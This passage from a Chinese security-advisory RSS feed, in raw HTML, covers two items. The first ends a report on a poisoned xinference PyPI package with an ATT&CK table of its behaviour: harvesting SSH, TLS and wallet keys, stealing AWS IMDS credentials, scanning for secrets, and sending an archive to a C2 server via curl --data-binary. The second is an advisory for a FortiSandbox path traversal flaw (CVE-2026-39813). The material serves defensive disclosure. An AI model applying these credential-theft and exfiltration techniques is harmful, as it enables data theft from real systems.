400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1552.004</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">收集</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">SSH</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">私钥、</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">TLS</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">私钥、加密钱包</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">keystore</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Credential </span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Access</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Cloud Instance Metadata API</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1552.005</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">获取</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">AWS IMDSv2</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">令牌及</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">IAM</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">角色凭据</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Discovery</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">System Information Discovery</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1082</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">hostname / uname -a / ip addr </span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">等主机画像命令</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Discovery</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Cloud Service Discovery</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1526</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">AWS Secrets Manager ListSecrets</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">、</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">SSM DescribeParameters</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">枚举</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Collection</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Data from Local System</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1005</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">广泛递归扫描本地凭据、配置与密钥材料</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Exfiltration</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Exfiltration Over Web Service</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1567</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">经</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">curl --data-binary</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">外传</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">love.tar.gz</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">至</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">C2</span></font></p></td></tr><tr style="height:43.7500pt;"><td data-colwidth="110" width="141" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Exfiltration</span></p></td><td data-colwidth="154" width="255" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">Exfiltration Over C2 Channel</span></p></td><td data-colwidth="70" width="130" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">T1041</span></p></td><td data-colwidth="298" width="268" valign="top"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-align: left;"><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">通过自定义</span></font><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">HTTP</span><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">头</span></font><font face="Arial"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">X-QT-SR: 14</span></font><font face="宋体"><span leaf="" style="font-style: normal;font-weight: 400;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;">标识通信</span></font></p></td></tr></tbody></table></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">参考链接</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1.<a href="https://github.com/xorbitsai/inference/issues/4828" target="_blank">https://github.com/xorbitsai/inference/issues/4828</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2.<a href="https://github.com/xorbitsai/inference/issues/4528" target="_blank">https://github.com/xorbitsai/inference/issues/4528</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3.<a href="https://research.jfrog.com/post/xinference-compromise/" target="_blank">https://research.jfrog.com/post/xinference-compromise/</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4.<a href="https://www.ox.security/blog/xinference-allegedly-hacked-by-teampcp-malicious-package-in-pypi/" target="_blank">https://www.ox.security/blog/xinference-allegedly-hacked-by-teampcp-malicious-package-in-pypi/</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5.<a href="https://securityboulevard.com/2026/04/a-poisoned-xinference-package-targets-ai-inference-servers/" target="_blank">https://securityboulevard.com/2026/04/a-poisoned-xinference-package-targets-ai-inference-servers/</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">6.<a href="https://cloud.tencent.com/announce/detail/2263" target="_blank">https://cloud.tencent.com/announce/detail/2263</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">7.<a href="https://mp.weixin.qq.com/s/RdDiw93k2tcr0YYqnc-V4Q" target="_blank">https://mp.weixin.qq.com/s/RdDiw93k2tcr0YYqnc-V4Q</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">8.<a href="https://finance.eastmoney.com/a/202604233715088018.html" target="_blank">https://finance.eastmoney.com/a/202604233715088018.html</a></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b102b005&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525409%26idx%3D1%26sn%3D0a13bb93d699cc80e341b74d5d9e6f6b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 20:29:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】FortiSandbox目录遍历漏洞(CVE-2026-39813)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525409&amp;idx=2&amp;sn=59c0589b623e6dab519fe3c291a01d44</link>
      <description>2026年4月23日，深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息，漏洞编号：CVE-2026-39813，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-24 20:29</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f2191c94&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxSWpn8NV6Bj0Mp5Cq6vpdyR8HibwCnn4iafhk6T3PvAkQdgtcLzw9AkQ5aRsNxxicHt2BQxZuhv4AxWAcvplR87Wjx7UgvBNrr3A4%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月23日，深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息，漏洞编号：CVE-2026-39813，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041735" data-ratio="0.16635687732342008" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=2f260fae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRvjQ66aLIIsCcyAIaWONUVbOia0W3zFDFFcicasuB3AQjzK2nPEiaqRkZhFOialqrpcjR6DoL0MxMYkMUesKgny2rYIt1KqrQdNew%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiSandbox目录遍历漏洞(CVE-2026-39813)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiSandbox</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5.0.0 ≤=FortiSandbox≤= 5.0.5  </span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4.4.0 ≤=FortiSandbox≤= 4.4.8</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目录遍历</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需授权即可造成敏感信息泄露。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，能够造成敏感信息泄露。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041739" src="https://wechat2rss.xlab.app/img-proxy/?k=453fb588&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSgFzlwjOS3sneTl3EmM37N2QNibfliacQwIZVozs66eccc9ydZXlQK2ThM8uohqPaiaz5KTWRqYhK9UDiaZSJJ1Gzywo9kNHdk1N0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Fortinet FortiSandbox 是一款先进的沙箱技术，旨在通过动态分析检测和防御未知的恶意软件和攻击。它能够有效地模拟攻击环境并捕捉潜在威胁，提升网络安全性。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041738" src="https://wechat2rss.xlab.app/img-proxy/?k=fecec106&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQXibcFXEP7u6Ef0TicnMEc9UqaZ1yTZhL1ia2LGtiaGRsf9Dmgnn7AWLA5eS4FhH4fhZxlEqGZjSibNqF8vEM3CZvWlFkBvZbkWiavQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月23日，深瞳漏洞实验室监测到一则FortiSandbox组件存在目录遍历漏洞的信息，漏洞编号：CVE-2026-39813，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Fortinet FortiSandbox 5.0.0 至 5.0.5 和 4.4.0 至 4.4.8 包含因错误输入验证导致的路径遍历，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">允许攻击者通过精心设计的路径穿越提升权限，利用漏洞则要求攻击者发送精心设计的请求。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的FortiSandbox版本：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">5.0.0 ≤FortiSandbox≤ 5.0.5  </span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">4.4.0 ≤FortiSandbox≤ 4.4.8</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: 